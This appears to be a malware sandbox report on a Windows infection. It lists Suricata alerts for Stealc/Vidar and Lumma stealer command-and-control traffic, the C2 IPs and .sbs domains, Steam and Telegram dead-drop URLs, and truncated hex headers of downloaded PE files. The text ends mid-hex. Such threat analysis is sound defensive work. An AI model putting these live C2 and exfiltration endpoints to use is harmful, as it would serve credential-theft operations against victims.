Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_001E9FE8

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:51293 -> 95.164.90.97:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:51293
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:51293
Source: Network traffic Suricata IDS: 2056502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bemuzzeki .sbs) : 192.168.2.4:59347 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056524 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wickedneatr .sbs) : 192.168.2.4:54905 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frizzettei .sbs) : 192.168.2.4:59563 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exemplarou .sbs) : 192.168.2.4:50020 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056518 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (isoplethui .sbs) : 192.168.2.4:62537 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056520 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (laddyirekyi .sbs) : 192.168.2.4:51199 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056516 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (invinjurhey .sbs) : 192.168.2.4:53745 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:51297 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2056512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exilepolsiy .sbs) : 192.168.2.4:57388 -> 1.1.1.1:53
Source: Malware configuration extractor URLs: frizzettei.sbs
Source: Malware configuration extractor URLs: invinjurhey.sbs
Source: Malware configuration extractor URLs: exemplarou.sbs
Source: Malware configuration extractor URLs: isoplethui.sbs
Source: Malware configuration extractor URLs: wickedneatr.sbs
Source: Malware configuration extractor URLs: laddyirekyi.sbs
Source: Malware configuration extractor URLs: bemuzzeki.sbs
Source: Malware configuration extractor URLs: exilepolsiy.sbs
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor URLs: https://t.me/maslengdsa
Source: global traffic TCP traffic: 192.168.2.4:51292 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Tue, 08 Oct 2024 00:45:22 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT Connection: keep-alive ETag: "6560a86a-258600" Accept-Ranges: bytes Data Raw: (PE file bytes omitted)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:28 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:29 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 
72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:30 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:30 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:31 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 
00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:31 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:39 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Tue, 08 Oct 2024 00:39:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67047f44-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 43 7f 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 